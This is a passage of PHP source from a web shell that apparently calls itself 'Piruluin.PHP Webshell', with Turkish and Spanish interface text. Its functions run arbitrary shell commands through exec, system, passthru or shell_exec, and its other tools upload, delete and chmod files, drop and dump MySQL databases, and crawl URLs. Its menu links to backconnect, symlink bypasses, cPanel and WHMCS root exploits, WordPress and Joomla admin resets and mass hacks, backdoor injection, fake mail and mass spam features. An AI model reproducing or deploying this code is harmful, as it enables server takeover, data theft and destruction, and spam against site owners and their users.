438. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAqZJREFUeNqMUltIFFEY/v45Z3bd1Wy9BaVpKlkSaiRivXaxoCBCEuwhgqDsISoxkCAIeiojeiixXoTowbLLQ9CD9GohorimSGKTLqWZYnnZNfcyp//MeCMK+pl/Zs5/vv/+UX/LgR92PBpQdgJayBAgIb8SGYf55NUmrAg5jwRR14pZaueyulYgFndBQqD3/qlsDjJAtOa7GoMTGNKcIkNucgIo22bnJUSHm6AUwcyuxp66J4BBq1ndl3I/0kSw+XSWMEUFV9ItHZAK84WP7wXik29WwboC4kDk/GugDaPwCl8rDIVmo8V5Ae5HIxMRLovbJbHWMn8MYeBz90fMhCb4qJwARLWMlSja7O3jub1yA+AXhEcHkE4qt2qC1TWIlIAXhce5JXt5RiutmB4EW86ekE5tIorRnmFMW1/Wjwt55duRnpOBmHUPpNSyVcHw5SAqdmA2Eu+SZBhYmrAQXZhHRX0bZ+J1KnLaSYSauV0DkjE8dd2TG3tDMSKDgxifirVJ3jfmJsaQmrMTiFiwpzt0DicXiSQI7Sh8aB14ivZPvU717IIqbx4uNY09FheOFdyAiiOzqASml1eKRR5FEquHh+UBPH52fob3P3uwvxw4s68BKWnvMBSZxbYj8Bt6TfPfJuHP38rgJVBKgHWjo0jWmobnI90ozQfCvO3SjCaEI8CuXIbbuChtRXO8ltTgwwfQpFJr7GFWEHzwaoqgMvsqKrbcduyXKxV6xhvR2XfLQZZdqy3eHYsnEupP3tqwF8L24veakZd7C3jZMeD6QYWbbwl+E+i3mH8fHlUFS851jLgL/qvYRw+h3RrHydxMoHO0kfkP8BmLM3hBHAD/El4e/MqD/POvc6vv4G5yOqo1HTR1tHN7A+oJ/y88NmStO0+xhn4LMACJMOOyazadagAAAABJRU5ErkJggg==';
439. }
440. if ($mostrar_icono)
441. {
442. header('Content-type: image/gif');
443. echo base64_decode($mostrar_icono);
444. }
445. else
446. {
447. echo 'kkr';
448. }
449. }
450. function upload_file($dir)
451. {
452. global $lenguaje;
453. echo '<form action="?id=upload_fil3&d='.$dir.'" method="post" enctype="multipart/form-data">
454.      <input type="file" name="uploadfile" /><br />
455.      <br />
456.      <input type="submit" value="'.$lenguaje[17].'" /><br /><br />';
457. if (is_writable($dir))
458. {
459. echo '<b><font color=green>Yüklenebilir -> ('.ver_permisos(fileperms($dir)).')</font></b>';
460. }
461. else
462. {
463. echo '<b><font color=red>Yüklenemez -> ('.ver_permisos(fileperms($dir)).')</font></b>';
464. }
465. echo '</form>
466.    </td>
467.     </tr>';
468. }
469. function f0rm_exec($dir)
470. {
471. global $lenguaje;
472. echo '<form action="?id=c0d3_3x3c&d='.$dir.'" method="post">
473.      <input type="input" name="ax3" size="50"/> <br />
474.      <br />
475.      <input type="submit" value="'.$lenguaje[18].'" />';
476. echo '</form>';
477. }
478. function is_disabled($funcion)
479. {
480. $funciones_deshabilitadas=explode(',',ini_get('disable_functions'));
481. return in_array($funcion,$funciones_deshabilitadas);
482. }
483. function c0d3_ex3c($cmd,$dir)
484. {
485. global $Sonuç;
486. @chdir($dir);
487. if (is_callable('exec') &&!is_disabled('exec'))
488. {
489. ob_start('buffer_exec');
490. exec($cmd,$Sonuçado);
491. echo join("
492. ",$Sonuçado);
493. ob_end_flush();
494. }
495. elseif (is_callable('system') &&!is_disabled('system'))
496. {
497. ob_start('buffer_exec');
498. system($cmd);
499. ob_end_flush();
500. }
501. elseif (is_callable('passthru') &&!is_disabled('passthru'))
502. {
503. ob_start('buffer_exec');
504. passthru($cmd);
505. ob_end_flush();
506. }
507. elseif (is_callable('shell_exec') &&!is_disabled('shell_exec'))
508. {
509. ob_start('buffer_exec');
510. echo shell_exec($cmd);
511. ob_end_flush();
512. }
513. return $Sonuç;
514. }
515. function rm_dir_pwn($px)
516. {
517. $h = @opendir($px);
518. while (($item_pwn = @readdir($h)) !== FALSE)
519. {
520. if (($item_pwn!= '.') and ($item_pwn != '..'))
521. {
522. if (!is_dir($px.$item_pwn))
523. {
524. @unlink($px.$item_pwn);
525. }
526. else
527. {
528. rm_dir_pwn($px.$item_pwn.DIRECTORY_SEPARATOR);
529. @rmdir($px.$item_pwn);
530. }
531. }
532. }
533. @closedir($h);
534. @rmdir($px);
535. return !is_dir($px);
536. }
537. function rm_items_pwn($o)
538. {
539. $is_dir_x = is_dir($o);
540. $o = str_replace("\",DIRECTORY_SEPARATOR,$o);
541. if (is_dir($o))
542. {
543. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
544. return rm_dir_pwn($o);
545. }
546. elseif (is_file($o))
547. {
548. return @unlink($o);
549. }
550. else
551. {
552. if ($is_dir_x)
553. {
554. $sa_dir=is_dir($o);
555. rm_dir_pwn($o);
556. if (!$sa_dir)
557. {
558. return TRUE;
559. }
560. else
561. {
562. return FALSE;
563. }
564. }
565. }
566. }
567. function login_form_mysql()
568. {
569. global $lenguaje;
570. echo '<div align="center">
571.      <form method="GET" action="">
572.      <table width="236" border="0" cellspacing="0" cellpadding="0" align="center">
573.      <tr>
574.      <td width="92">Host:</td>
575.      <td width="144" align="right"><input type="text" name="hostm" id="mysql_host" value="localhost"></td>
576.      </tr>
577.      <tr>
578.      <td>'.$lenguaje[19].'</td>
579.      <td align="right"><input type="text" name="userm" id="mysql_user"></td>
580.      </tr>
581.      <tr>
582.      <td>'.$lenguaje[20].'</td>
583.      <td align="right"><input type="text" name="passm" id="mysql_password">
584.      <input type="hidden" name="id" value="log_mysql"></td>
585.      </tr>
586.      </table>
587.      <br />
588.      <input type="submit" value="'.$lenguaje[21].'">
589.      <br />
590.      </form>
591.      </div>';
592. }
593. function post_form_mysql($host,$user,$pass)
594. {
595. global $conexion;
596. $conexion=@mysql_pconnect($host,$user,$pass);
597. if ($conexion)
598. {
599. return true;
600. }
601. else
602. {
603. return false;
604. }
605. }
606. function listar_dbs()
607. {
608. global $conexion,$dir,$lenguaje;
609. echo '<div align="center"><br /> <a href="?id=mysql_login&d='.$dir.'">'.$lenguaje[25].'</a><br/><br/>
610.      <table cellspacing=1 cellpadding=2>';
611. $mysql_list_db = @mysql_list_dbs($conexion);
612. $num = @mysql_num_rows($mysql_list_db);
613. for($i=0;$i<$num;$i++)
614. {
615. $dbname = @mysql_dbname($mysql_list_db,$i);
616. echo '<tr>
617.          <td>'.htmlspecialchars($dbname).'</td>
618.          <td><a href="?id=list_tb&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[22].'</a></td>
619.          <td><a href="?id=drop_db&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[23].'</a></td>
620.          <td><a href="?id=dump3r&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&db='.htmlspecialchars($dbname).'">'.$lenguaje[24].'</a></td>
621.          </tr>';
622. }
623. echo '</table></div>';
624. }
625. function listar_tbs($db)
626. {
627. global $conexion,$lenguaje;
628. $list_tables=@mysql_list_tables($db);
629. $num=@mysql_num_rows($list_tables);
630. if ($num)
631. {
632. echo '<div align="center">'.htmlspecialchars($db).' -
633.          <a href="?id=listar_dbs&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'">'.$lenguaje[25].'</a><br/><br/>
634.          <table cellspacing=1 cellpadding=2>';
635. for($i=0;$i<$num;$i++)
636. {
637. $nombre_tabla=@mysql_tablename($list_tables,$i);
638. echo '<tr>
639.                      <td>
640.                      '.htmlspecialchars($nombre_tabla).'
641.                      </td>
642.                      <td>
643.                      <a href="?id=ver_schema&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tbname='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">Schema</a>
644.                      </td>
645.                      <td>
646.                      <a href="?id=mostrar_datos&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tbname='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">'.$lenguaje[26].'</a>
647.                      </td>
648.                      <td>
649.                      <a href="?id=drop_tb&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($db).'&tbname='.htmlspecialchars($nombre_tabla).'">'.$lenguaje[23].'</a>
650.                      </td>
651.                      <td>
652.                      <a href="?id=dump3r&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tablename='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">'.$lenguaje[24].'</a>
653.                      </td>
654.                      </tr>';
655. }
656. echo '</table></div>';
657. }
658. else
659. {
660. echo $lenguaje[27].'<br /> <br /> <a href="?id=listar_dbs&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'">'.$lenguaje[25].'</a>';
661. }
662. }
663. function ver_schema($nombre_tabla,$dbname)
664. {
665. global $conexion,$lenguaje;
666. $query_show_fields = @mysql_db_query($dbname,"SHOW fields FROM $nombre_tabla");
667. $num = @mysql_num_rows($query_show_fields);
668. echo '<div align="center">';
669. echo $nombre_tabla.' -  <a href="?id=list_tb&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[25].'</a> <br/><br/>
670.      <table cellspacing=1 cellpadding=2 border=1>
671.      <tr>
672.      <td>'.$lenguaje[29].'</td>
673.      <td>'.$lenguaje[30].'</td>
674.      <td>'.$lenguaje[31].'</td>
675.      <td>'.$lenguaje[32].'</td>
676.      <td>'.$lenguaje[33].'</td>
677.      <td>'.$lenguaje[34].'</td>
678.      </tr>';
679. for( $i = 0;$i <$num;$i++)
680. {
681. $field=@mysql_fetch_array($query_show_fields);
682. echo '<tr>
683.           <td>&nbsp;'.$field['Field'].'</td>
684.           <td>&nbsp;'.$field['Type'].'</td>
685.           <td>&nbsp;'.$field['Null'].'</td>
686.           <td>&nbsp;'.$field['Key'].'</td>
687.           <td>&nbsp;'.$field['Default'].'</td>
688.           <td>&nbsp;'.$field['Extra'].'</td>
689.           </tr>';
690. }
691. echo '</table>';
692. echo '</div>';
693. }
694. function paginar($table,$db)
695. {
696. global $conexion;
697. @mysql_select_db($db);
698. $sergio=@mysql_query("SELECT * FROM $table");
699. $total_paginas=mysql_num_rows($sergio) / 30;
700. for ($pag=0;$pag <$total_paginas;$pag++)
701. {
702. $paginas[]='<a href="?id=mostrar_datos&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&tbname='.htmlspecialchars($_GET['tbname']).'&db='.htmlspecialchars($_GET['db']).'&pag='.($pag * 30).'">'.$pag.'</a>';
703. }
704. echo '<table width="400" border="1" cellpadding="0" cellspacing="0">
705.     <tr>
706.     <td align="center">';
707. echo '<font style="font-size:9px; font-family: Verdana">';
708. $paginas_z=implode(' ',$paginas);
709. if ($paginas_z)
710. {
711. echo $paginas_z;
712. }
713. else
714. {
715. echo 'Err0r';
716. }
717. echo '</font></td>
718.       </tr>
719.     </table>';
720. }
721. function mostrar_datos($tablename,$db,$inicio_limit,$fin_limit)
722. {
723. global $conexion,$total_paginas,$lenguaje;
724. @mysql_select_db($db);
725. if ($total_paginas=='1')
726. {
727. $query_pwn="SELECT * FROM $tablename";
728. }
729. else
730. {
731. $query_pwn="SELECT * FROM $tablename LIMIT $inicio_limit,$fin_limit";
732. }
733. $query_columnas=@mysql_query("SHOW COLUMNS FROM $tablename");
734. $query_datos=@mysql_query($query_pwn);
735. $control_datos=@mysql_fetch_row($query_datos);
736. if ($control_datos)
737. {
738. @mysql_free_Sonuç($query_datos);
739. $query_datos=@mysql_query($query_pwn);
740. echo '<div align="center">';
741. echo '<table cellspacing=1 cellpadding=1 border=1>';
742. echo '<tr>';
743. while ($columna=@mysql_fetch_row($query_columnas))
744. {
745. echo '<td>'.$columna[0].'</td>';
746. $columnas_matriz[]=$columna[0];
747. flush();
748. ob_flush();
749. }
750. echo '</tr>';
751. while ($datos=@mysql_fetch_row($query_datos))
752. {
753. echo '<tr>';
754. for($i=0;$i <count($columnas_matriz);$i++)
755. {
756. echo '<td>&nbsp;'.htmlspecialchars($datos[$i]).'</td>';
757. }
758. flush();
759. ob_flush();
760. echo '</tr>';
761. }
762. echo '</table>';
763. echo '</div>';
764. }
765. else
766. {
767. echo $lenguaje[35];
768. }
769. }
770. function dump3r($user,$password,$host,$db,$tablename='')
771. {
772. if (!$tablename == '')
773. {
774. $filename = $tablename;
775. }
776. else
777. {
778. $filename = $db;
779. }
780. header("Content-disposition: filename=$filename.sql");
781. header('Content-type: application/octetstream');
782. header('Pragma: no-cache');
783. header('Expires: 0');
784. $query_dump = mysql_query('show variables');
785. while(1)
786. {
787. $array_r0w = mysql_fetch_row($query_dump);
788. if ($array_r0w == false) break;
789. if ($array_r0w[0] == 'basedir')
790. $bindir = $array_r0w[1].'bin/';
791. }
792. echo base64_decode('LS0gRHVtcDNkIGJ5IFBpcnVsaW4uUEhQIFdlYnNoM2xsIHYxLjAgYzBkZWQgYnkgcjBkcjEgOkw=');
793. echo '
794.      ';
795. passthru($bindir."mysqldump --host=$host --user=$user --password=$password $db $tablename");
796. }
797. function drop_db($dbname)
798. {
799. global $conexion,$lenguaje;
800. if (isset($_POST['ok']))
801. {
802. if (mysql_query("DROP DATABASE $dbname",$conexion))
803. {
804. echo '<b>'.$lenguaje[36].'</b><br /><br />';
805. listar_dbs();
806. }
807. else
808. {
809. echo '<b>'.$lenguaje[36].'</b><br /><br />';
810. listar_dbs();
811. }
812. }
813. else
814. {
815. echo '<form method="post" action="">'.$lenguaje[38].' '.htmlspecialchars($dbname).' ?
816.          <br />
817.          <br />
818.          <input type="hidden" name="ok" value="1">
819.          <input type="submit" value="'.$lenguaje[39].'">
820.          </form>';
821. }
822. }
823. function drop_tb($tbname,$dbname)
824. {
825. global $conexion,$lenguaje;
826. if (isset($_POST['ok']))
827. {
828. @mysql_select_db($dbname);
829. if (mysql_query("DROP TABLE $tbname",$conexion))
830. {
831. echo '<b>'.$lenguaje[40].'</b><br /> <br />';
832. listar_tbs($_GET['dbname']);
833. }
834. else
835. {
836. echo '<b>'.$lenguaje[41].'</b><br /> <br />';
837. listar_tbs($_GET['dbname']);
838. }
839. }
840. else
841. {
842. echo '<form method="post" action="">'.$lenguaje[42].' '.htmlspecialchars($tbname).' ?
843.          <br />
844.          <br />
845.          <input type="hidden" name="ok" value="1">
846.          <input type="submit" value="'.$lenguaje[39].'">
847.          </form>';
848. }
849. }
850. function form_mailer()
851. {
852. global $lenguaje;
853. echo '<form method="post" action="">
854.      <table width="655" border="0" cellspacing="0" cellpadding="0">
855.      <tr>
856.      <td width="115"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[43].': </font></td>
857.      <td width="10">&nbsp;</td>
858.      <td width="317"><input name="email" type="text" id="email" size="40"></td>
859.      <td width="19" rowspan="4">&nbsp;</td>
860.      <td width="197"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[44].':</font></td>
861.      </tr>
862.      <tr>
863.      <td><p><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[45].'</font>
864.      <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">:</font></p></td>
865.      <td height="22">&nbsp;</td>
866.      <td><input name="titulo" type="text" id="titulo" size="50"></td>
867.      <td rowspan="3"><textarea name="maillist" cols="30" rows="12" id="maillist"></textarea></td>
868.      </tr>
869.      <tr>
870.      <td><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[3].':</font></td>
871.      <td>&nbsp;</td>
872.      <td><input name="nombre" type="text" id="nombre" size="40"></td>
873.      </tr>
874.      <tr>
875.      <td><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[46].': </font></td>
876.      <td valign="top">&nbsp;</td>
877.      <td><textarea name="contenido" cols="50" rows="9" id="contenido"></textarea></td>
878.      </tr>
879.      </table>
880.      <div align="center">
881.      <input type="submit" value="'.$lenguaje[17].'">
882.      </div>
883.      </form>';
884. }
885. function crawl3r()
886. {
887. global $lenguaje;
888. echo '<form method="GET" action="">
889.             <input type="hidden" name="id" value="crawl3r">
890.             <table width="395" border="0" cellspacing="0" cellpadding="0">
891.             <tr>
892.             <td width="95">Link:</td>
893.             <td width="300"><input type="text" name="url" size="50"></td>
894.             </tr>
895.             <tr>
896.             <td colspan="2" align="center"><br><input type="submit" value="OK"></td>
897.             </tr>
898.             </table>
899.             </form><br />';
900. if (((isset($_GET['url'])) and (!isset($_GET['b64_url']))) or (((!isset($_GET['url'])) and (isset($_GET['b64_url'])))))
901. {
902. if (isset($_GET['url']))
903. {
904. $str = @file_get_contents($_GET['url']);
905. $url = $_GET['url'];
906. echo htmlentities(utf8_decode($url));
907. }
908. else
909. {
910. $str = @file_get_contents(base64_decode($_GET['b64_url']));
911. $url = base64_decode($_GET['b64_url']);
912. echo htmlentities(utf8_decode($url));
913. }
914. echo '<br /><br />';
915. if ($str)
916. {
917. $doc = new DOMDocument();
918. @$doc->loadHTML($str);
919. $hrefs = $doc->getElementsByTagName('a');
920. if ($hrefs)
921. {
922. echo '<table border="1" cellspacing="0" cellpadding="0">';
923. $i=0;
924. foreach($hrefs as $href)
925. {
926. $oki=$href->getAttribute('href');
927. if ((trim($oki) != '') &&!(@in_array($oki,$matches_href)) &&(trim($oki)!='/') &&(trim($oki[0])!='#') &&(substr(trim($oki),0,10)!='javascript'))
928. {
929. if ($oki[0] != 'h')
930. {
931. echo '<tr>
932.                             <td>'.$i.'</td>
933.                             <td width="50">-----</td>
934.                             <td>';
935. }
936. else
937. {
938. echo '<tr>
939.                             <td>'.$i.'</td>
940.                             <td width="50"><a href="?id=crawl3r&b64_url='.base64_encode($oki).'">Scan it!</a></td>
941.                             <td>';
942. }
943. if ($oki)
944. {
945. echo htmlspecialchars(utf8_decode($oki));
946. }
947. else
948. {
949. echo '&nbsp;';
950. }
951. echo '</td>
952.                             </tr>';
953. $i++;
954. }
955. }
956. echo '</table>';
957. }
958. }
959. else
960. {
961. echo $lenguaje[96].' <br /><br /><br />';
962. }
963. }
964. }
965. function borrrar_checkbox($dir_pwn,$directorios,$archivos)
966. {
967. global $lenguaje;
968. if (isset($_POST['directorios_confirmados']) or isset($_POST['archivos_confirmados']))
969. {
970. $directorios_confirmados=$_POST['directorios_confirmados'];
971. $archivos_confirmados=$_POST['archivos_confirmados'];
972. for ($i = 0;$i <count($directorios_confirmados);$i++)
973. {
974. $rm_dir=rm_items_pwn(realpath($directorios_confirmados[$i].'/'));
975. if($rm_dir)
976. {
977. echo '<b><font color="green">'.$lenguaje[68].'! -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'</font></b><br /><br />';
978. }
979. else
980. {
981. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'</font></b><br /<br />';
982. }
983. }
984. for ($i = 0;$i <count($archivos_confirmados);$i++)
985. {
986. $rm_items=rm_items_pwn(realpath($archivos_confirmados[$i]));
987. if($rm_items)
988. {
989. echo '<b><font color="green">'.$lenguaje[69].'! -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'</font></b><br /><br />';
990. }
991. else
992. {
993. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'</font></b><br /<br />';
994. }
995. }
996. echo '<form action="" method="GET">
997.         <input type="submit" value="'.$lenguaje[57].'"></form>';
998. }
999. else
1000. {
1001. echo '<br />'.$lenguaje[86].'<br />';
1002. echo '<form action="" method="post">
1003.         <input type="hidden" name="menu_dirs" value="borrar">
1004.         <table height="20" border="1" cellpadding="0" cellspacing="0">';
1005. for ($i = 0;$i <count($directorios);$i++)
1006. {
1007. $dir_ok=realpath($dir_pwn.'/'.$directorios[$i]);
1008. echo '<tr>
1009.             <td>'.$dir_ok.'</td>
1010.             <td width="20"><input type="checkbox" name="directorios_confirmados[]" value="'.$dir_ok.'" checked>
1011.             </td>
1012.             </tr>';
1013. }
1014. for ($i = 0;$i <count($archivos);$i++)
1015. {
1016. $archivo_ok=realpath($dir_pwn.'/'.$archivos[$i]);
1017. echo '<tr>
1018.             <td>'.$archivo_ok.'</td>
1019.             <td width="20"><input type="checkbox" name="archivos_confirmados[]" value="'.$archivo_ok.'" checked>
1020.             </td>
1021.             </tr>';
1022. }
1023. echo '</table><br />
1024.         <input type="submit" value="'.$lenguaje[17].'">
1025.         </form>';
1026. }
1027. }
1028. function reverse_dns()
1029. {
1030. if ($_POST)
1031. {
1032. $web = $_POST['url'];
1033. if (ereg('http://',$web))
1034. {
1035. $web=str_replace('http://','',$web);
1036. }
1037. if ($web[strlen($web)-1] == '/')
1038. {
1039. $web=substr($web,0,-1);
1040. }
1041. $ip = gethostbyname($web);
1042. $source = file_get_contents('http://www.ip-adress.com/reverse_ip/'.$ip);
1043. preg_match_all('|<a href="/whois/(.*?)">Whois</a>|',$source,$sitios);
1044. echo 'Web: '.$web.' <br />
1045.               IP : '.$ip.' <br />
1046.               Total de sitios (Reverse DNS): '.count($sitios[1]).'<br /><br />';
1047. foreach ($sitios[1] as $site)
1048. {
1049. echo '<a href="http://'.htmlentities($site).'">'.htmlentities($site).'</a><br />';
1050. }
1051. }
1052. else
1053. {
1054. echo '<form action="" method="POST">
1055.         <table>
1056.         <tr>
1057.         <td>Url (ej: www.google.com.tr): </td>
1058.         <td><input type="text" name="url"></td>
1059.         <tr/>
1060.         </table>
1061.         <br />
1062.         <input type="submit" value="Checkear">
1063.         </form>';
1064. }
1065. }
1066. function pwn_chmod($pwn)
1067. {
1068. global $lenguaje;
1069. $old=substr(sprintf('%o',@fileperms($pwn)),-4);
1070. if (is_numeric($old))
1071. {
1072. if (isset($_POST['nuevos_permisos']))
1073. {
1074. if (is_numeric($_POST['nuevos_permisos']))
1075. {
1076. if (@chmod($pwn,$_POST['nuevos_permisos']))
1077. {
1078. echo $lenguaje[90];
1079. }
1080. else
1081. {
1082. echo $lenguaje[91];
1083. }
1084. }
1085. else
1086. {
1087. echo $lenguaje[92];
1088. }
1089. echo '<br /><br />';
1090. }
1091. else
1092. {
1093. echo realpath($pwn).'<br /><br /><form method="post" action="">
1094.             '.$lenguaje[93].':
1095.             <input type="text" id="old" disabled id="old" readonly="readonly" value="'.$old.'">
1096.             <br /><br />'.$lenguaje[94].':
1097.             <input type="text" name="nuevos_permisos" id="nuevos_permisos">
1098.             <br /><br />
1099.             <input type="submit" value="editar">
1100.             </form><br />';
1101. }
1102. }
1103. else
1104. {
1105. echo $lenguaje[89].'<br /><br />';
1106. }
1107. }
1108. if (isset($_GET['id']))
1109. {
1110. $id_menu=$_GET['id'];
1111. }
1112. else
1113. {
1114. $id_menu='dir';
1115. }
1116. if ($id_menu == 'icono')
1117. {
1118. mostrar_iconos($_GET['tipo']);
1119. exit();
1120. }
1121. if (($id_menu != 'phpinfo') &&($id_menu!='proxy') &&($id_menu != 'fdown') &&($id_menu!='dump3r'))
1122. {
1123. $homedir=getcwd();
1124. if (isset($_GET['d']))
1125. {
1126. $dir=realpath($_GET['d']);
1127. }
1128. css();
1129. header_index();
1130. if ($_GET[id]=='reverse'){
1131. $site = "$_GET[site]";
1132. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
1133. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
1134. foreach($kursat[1] as $cem)
1135. {
1136. echo str_replace('?','',$cem).'<br>';
1137. }
1138. }
1139. $site = getenv('HTTP_HOST');
1140. echo "<font color=grey>Sunucu reverse yap:</font><a href=?id=reverse&site=$site>$site</a>";
1141. echo '<table style="Border-Collapse: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#f6f2f2 borderColorLight=#c0c0c0 border=1>
1142.      <tr valign="top">
1143.      <td align="center">'.$lenguaje[52].':
1144.      <a href="http://'.gethostbyname($_SERVER['HTTP_HOST']).'/">'.gethostbyname($_SERVER['HTTP_HOST']).'</a> |
1145.      '.$lenguaje[53].': <b><font color="red">'.$_SERVER['REMOTE_ADDR'].'</font></b> | ';
1146. echo 'cURL: <b>';
1147. if(function_exists('curl_version'))
1148. {
1149. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
1150. }
1151. else
1152. {
1153. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
1154. }
1155. echo 'MySQL: <b>';
1156. if(function_exists('mysql_connect'))
1157. {
1158. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
1159. }
1160. else
1161. {
1162. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
1163. }
1164. echo 'MSSQL: <b>';
1165. if(function_exists('mssql_connect'))
1166. {
1167. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
1168. }
1169. else
1170. {
1171. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
1172. }
1173. echo 'PostgreSQL: <b>';
1174. if(function_exists('pg_connect'))
1175. {
1176. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
1177. }
1178. else
1179. {
1180. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
1181. }
1182. echo 'Perl: <b>';
1183. if (c0d3_ex3c('perl -h',$dir))
1184. {
1185. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
1186. }
1187. else
1188. {
1189. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
1190. }
1191. echo 'Oracle: <b>';
1192. if(function_exists('ocilogon'))
1193. {
1194. echo '<font color=green>'.$lenguaje[54].'</font></b>';
1195. }
1196. else
1197. {
1198. echo '<font color=red>'.$lenguaje[55].'</font></b>';
1199. }
1200. echo '</td>
1201.      </tr>
1202.      <tr valign="top">
1203.      <td align="center">'.$lenguaje[56].': '.disable_functions().'</td>
1204.      </tr>
1205.      </table>';
1206. echo '<br />
1207. <a href="?"><input type="submit" value="Dosya yönetimi"></a> ~  
1208. <a href=?id=php_exec&d='.$dir.'><input type="submit" value="PHP injex"></a> ~
1209. <a href=?id=phpini><input type="submit" value="Güvenlikleri kapat"></a> ~ <a href=?id=get><input type="submit" value="Siyanur5x"></a> ~ <a href=?id=angel><input type="submit" value="AngeLShell"></a> ~ <a href=?id=passwd><input type="submit" value="Passwd"></a> ~ <a href=?id=hta><input type="submit" value="Mod_security"></a> ~ <a href=?id=usr><input type="submit" value="Users"></a> ~ <a href=?id=cgitelnet><input type="submit" value="CGI Telnet"></a> ~ <a href=?id=tmplink><input type="submit" value="Tmplink"></a> ~ <a href=?id=php44><input type="submit" value="PHP4"></a> ~ <a href=?id=namedbypass><input type="submit" value="Auto Named"></a> ~ <a href=?id=perm><input type="submit" value="Symlink Auto"></a>
1210. ~ <a href=?id=symlist><input type="submit" value="Symlink"></a> ~ <a href=?id=manuelsym><input type="submit" value="Manuel Symlink"></a> ~ <a href=?id=yukle><input type="submit" value="Upload"></a></font> ~ <a href=?id=passwd1><input type="submit" value="Passwd 2"></a> ~ <a href=?id=joomlares><input type="submit" value="Joomla admin resetle"></a> ~ <a href=?id=pg><input type="submit" value="Pagerank"></a></font> ~ <a href=?id=cpanel><input type="submit" value="CpanelPwn"></a></font> ~ <a href=?id=bc><input type="submit" value="BackConnect"></a></font> ~ <a href=?id=feykmail><input type="submit" value="Fake mail"></a></font> ~ <a href=?id=eval><input type="submit" value="Eval çalýþtýr"></a></font>
1211. ~ <a href=?id=command2><input type="submit" value="Base64 Komut"></a>  ~ <a href=?id=lite1><input type="submit" value="LitespeedPwn 1"></a>  ~ <a href=?id=md5><input type="submit" value="Md5 oluþtur"></a>  ~ <a href=?id=uzakupload><input type="submit" value="Uzaktan yükle"></a>  ~ <a href=?id=komut><input type="submit" value="Komut satýrý"></a> ~ <a href=?id=whmcs><input type="submit" value="Whmcs r00t"></a> ~ <a href=?id=hash><input type="submit" value="Hash Generator"></a>  ~ <a href=?id=wpres><input type="submit" value="Wordpress admin resetle"></a>  ~ <a href=?id=shellbul><input type="submit" value="Shell bul"></a> ~ <a href=?id=reverse_dns><input type="submit" value="Reverse DNS"></a> ~
1212. <a href=?id=crawl3r><input type="submit" value="Crawler"></a> ~ <a href=?id=mail3r><input type="submit" value="SpamMailMass"></a> ~ <a href="?id=mysql_login&d='.$dir.'"><input type="submit" value="Mysql Baðlan"></a> ~ <a href=?id=CloudBypass><input type="submit" value="CloudFlare"></a> ~ <a href=?id=sifrele><input type="submit" value="Kod þifrele"></a> ~ <a href=?id=joomla><input type="submit" value="Joomla mass hack"></a> ~ <a href=?id=vb><input type="submit" value="Vb mass hack"></a> ~ <a href=?id=wp><input type="submit" value="Wp mass hack"></a> ~ <a href=?id=Cmdinject><input type="submit" value="CMD Backdoor inject"></a> ~ <a href=?id=reversem><input type="submit" value="Reverse ip"></a>
1213.  
1214. ';
1215. }
1216. if (($id_menu == 'dir') or (!$id_menu))
1217. {
1218. if (trim($dir)=='')
1219. {
1220. $dir = getcwd();
1221. }
1222. listar_archivos($dir);
1223. }
